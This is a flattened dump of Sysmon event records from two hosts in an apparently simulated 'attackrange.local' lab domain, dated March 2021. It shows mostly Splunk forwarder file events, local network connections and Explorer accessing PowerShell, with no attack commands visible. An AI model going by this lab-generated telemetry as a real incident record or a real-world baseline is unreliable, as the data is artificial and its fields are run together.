Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DBF7BD025AE463B2DDCF02B7C4BED86,SHA256=442B2DE4277768E208AF8C5B64C2D0315C252528A5B8BE564CA93F669DEDEC5D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061646Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:48.835{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54852-false10.0.1.12-8000- 23542300x80000000000000001061645Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:51.132{7F8C56E7-4E4C-6063-3300-00000000AF01}2364NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D9EB0706C587F50BBEE1233E6456AA7E,SHA256=500015F71F0118682B52F400F5B38916EBFAA2D1986DD68D3505915C1D0CDED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246512Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:51.773{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B69321C2C90040941EF95F03F03DDBA5,SHA256=9569D40CAA99C15E2B5DF5ADDC3778572BAE214D8923B9365B379B130429DBF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061647Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:52.351{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FA836A6C3AAE4C424C0B6CB1F822C35,SHA256=45C88330AFD31B1F49725519B4AD425DBCC3E22A1EEA9885D51DCE0EAC7506DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246514Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:52.851{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD0F890BB42488687DFFB6F86E84835C,SHA256=B6E96A01D933463D0EA9B675E4EFFB87383AFE38B3705FB3BA9FEB1DBC875BC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246513Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:52.695{CB4067E1-304B-6062-1200-00000000AF01}1008NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=96C21DE7F314B5E6B71E900A94B118D9,SHA256=A4E9EF076DFE6C419D0A633B1B0023D1FB949B8DFDD40D0D6E5D936C683F8055,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061648Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:49.929{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54853-false10.0.1.12-8089- 354300x8000000000000000246517Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:52.520{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64821-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246516Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:53.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9BA054368455BFD5BA2F9B35D2F7659C,SHA256=DCE7C2C98A4BABF3F35F1D5AA519C6F145F42CF1B254474F06D727D8197010CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246515Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:53.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8411CFE6284C500BDE9F9B0625E90978,SHA256=E5AF731F58FCEE5ED4BA65A1FDB8D014B4F49DE8036DD70C20B2526FF8E4296D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061650Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:54.070{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE9D8C2A4DB6B9B672486C31F708EEFE,SHA256=CFA11B039E61F99EE3261524DE9BC81859862140EA7E27C98B378BBEEE47181B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061649Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:54.070{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29774AEC81CC4CB783D32DFBAEF5C581,SHA256=78ADA37690C81D7CBEAD3579DF732C9224149A707E4D5ACEB13736B69C15EF77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246519Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:54.086{CB4067E1-30AF-6062-9800-00000000AF01}2672NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D9EB0706C587F50BBEE1233E6456AA7E,SHA256=500015F71F0118682B52F400F5B38916EBFAA2D1986DD68D3505915C1D0CDED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246518Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:54.070{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2EDA7CB825D5709F2E33FBB171E5A29,SHA256=03A3D0085622347467EE258B061720394D451E16CB5AB1E366191CA896D2598F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061651Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:55.430{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F6F73E27C1344FC4F0DC80D1BC9D39E,SHA256=4A251D321501B3D4677419ABD049EB30CEBC8F2661946B7CCD343585B8904A96,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246522Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:54.504{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64822-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x8000000000000000246521Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:55.117{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9BA054368455BFD5BA2F9B35D2F7659C,SHA256=DCE7C2C98A4BABF3F35F1D5AA519C6F145F42CF1B254474F06D727D8197010CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246520Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:55.086{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C8692CC94C305A7ECC06B9749845280,SHA256=09F0A2E4AA9F7666F6A585B89C5A442A1605C7C46D11947C209E50692592B3A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061654Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:56.789{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=09BF8D509E77F1C9DC6CFA28B473BDB4,SHA256=33CF2FF4B3AA1A608F01B7B3D1714D9D1ED85E8857E4AB3FCA4B30A5E97F50B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061653Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:56.789{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1FBF7F8108AAC955EF18ECC1766ADAB,SHA256=F4A308AD08A5C6FAB9B7567193A4043916C7DE0B1165CE4211B3076303DEB1A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061652Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:53.976{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54854-false10.0.1.12-8000- 23542300x8000000000000000246523Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:56.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C2B825D13C517FFD56DE7389AF26333,SHA256=9163F5F66E7D9D4583E42DD75BFDBF236FCF7CB9CB1242139F64076AF531D49E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246524Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:57.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D310A87A956C5F2A662E212A47B1E8A1,SHA256=0DB20ADC9C3D651177503F071DFDDB3700CD7E0578D65F80D0D25669E076B528,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061655Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:58.149{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3D380669849AC8AFCFC3EE9728C4C7F,SHA256=16EA464370839176B2CFF451CF029943904D0A625FE848A50D409737CAEE568E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246525Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:58.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C92E35C6192809743FAE17C526DCAE9A,SHA256=7AF6B7E1A5CFE5559B40336E1EBDF5CAF5B4DEA354DF397A83A11825D78886D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061656Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:59.508{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24D981DCC16C1EF7C51EE3273F2C6A70,SHA256=965FBE25F33649B5B406F4E8F5CFC9FAC5675B44F3E512C04001C8D98D8ECBD2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246528Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:58.535{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64823-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246527Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:59.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=836DCE3EEB43B7B9B75367542F736E72,SHA256=61AA28309C72019CE16150331543D662D7544EB2480A64D85A946489C93474C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246526Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:59.101{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=799F9B21E07658D98308F4C51B89976F,SHA256=EC9563D98534134DFF0963BCBC235D7CECA56293ACE32B16F988863192CF0CD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061657Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:00.883{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=436EA4FE4A325BA458C83809A3039289,SHA256=2D08CEF349832C465DAE4E00B558D70EAA6197C14CE8277802822F9185847A65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246529Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:00.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3DDF689730C2E49E11CF4696955BE29,SHA256=09C6884D976AC29F47304A3B924957AC996F6895E253614B53211B70C1ECFCDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246530Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:01.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DBDB1930076C5D1EECE9950624634CF,SHA256=A8117A71DFDE581FF61EB2348C37F472E7B2143B3C3CFD7136A7B83EDF42BD2A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061665Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:59.835{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54855-false10.0.1.12-8000- 23542300x80000000000000001061664Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:02.243{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CA408D36D542DFB3440C4441CA2B3BE,SHA256=006F84FBB9FBACE34829AD133C4AB024623A59B8ACC4E3E886CF5B31662B740E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061663Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:02.227{7F8C56E7-4E66-6063-8C00-00000000AF01}49644264C:\Windows\Explorer.EXE{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061662Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:02.227{7F8C56E7-4E66-6063-8C00-00000000AF01}49644264C:\Windows\Explorer.EXE{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061661Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:02.227{7F8C56E7-4E66-6063-8C00-00000000AF01}49644352C:\Windows\Explorer.EXE{7F8C56E7-4F87-6063-CA00-00000000AF01}5584C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061660Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:02.227{7F8C56E7-4E66-6063-8C00-00000000AF01}49644352C:\Windows\Explorer.EXE{7F8C56E7-4F87-6063-CA00-00000000AF01}5584C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061659Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:02.227{7F8C56E7-4E66-6063-8C00-00000000AF01}49644352C:\Windows\Explorer.EXE{7F8C56E7-4F87-6063-CA00-00000000AF01}5584C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061658Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:02.227{7F8C56E7-4E66-6063-8C00-00000000AF01}49644352C:\Windows\Explorer.EXE{7F8C56E7-4F87-6063-CA00-00000000AF01}5584C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000246531Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:02.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84C31514798D8E3E77AC3EA53FC363C1,SHA256=7A28063E99834EAB4793236D5EF91B4A725F6693A9C3AF8E5187D922F72B214C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061666Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:03.602{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6759871F52B0AD5337FBFEE86FD4D0CD,SHA256=3B42AE73FDB3F7447F3F0768DC995D808F781AA8AFC1DB97D7AB1AA62B5C97E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246532Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:03.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AED73406A9816961549308805F7180F,SHA256=7A2E50D5D86A1A038A77B7060E243F26DE7C00228D45F225AC3977A438943BCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061669Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:04.962{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B743844DCE7A95113F9DE1960692F36B,SHA256=CBE3BA17E247093885552B30009BCAFFE3CF561FC39F3F5CDBE28D727081CA84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061668Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:04.962{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ED45724124AB5672A1E9B0C985D6C65,SHA256=99B2F7BC370D7D7628C418142E97F20B7E6185B0F9BABCE17281A548935B3369,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061667Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:04.274{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=571694672EE8E3F963EB5A55DA088E35,SHA256=08293E8190578F0D7CA5141B4A65843C511D08DEC57578130EDC24698276AAB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246533Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:04.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20B3694A0828ED769ECBE992897CF921,SHA256=7BEA6E7F5D3846086088810E503B96B9FC55EA2A0023557EE1F7DA0681A2FEA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061671Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:05.634{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7205DEEF70F405411D92FD61E7134174,SHA256=0F963D52082028DEEAEE70317C4A5ABB4F312D02F83F527B80347BB225EAC23D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061670Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:05.634{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E7BCA81098A7AD422493E4C514A441BA,SHA256=7CA4ACB7EAB40ADED4D973E3A3A836908926974EE46433496F8891C4864F76DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246537Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:04.551{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64824-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 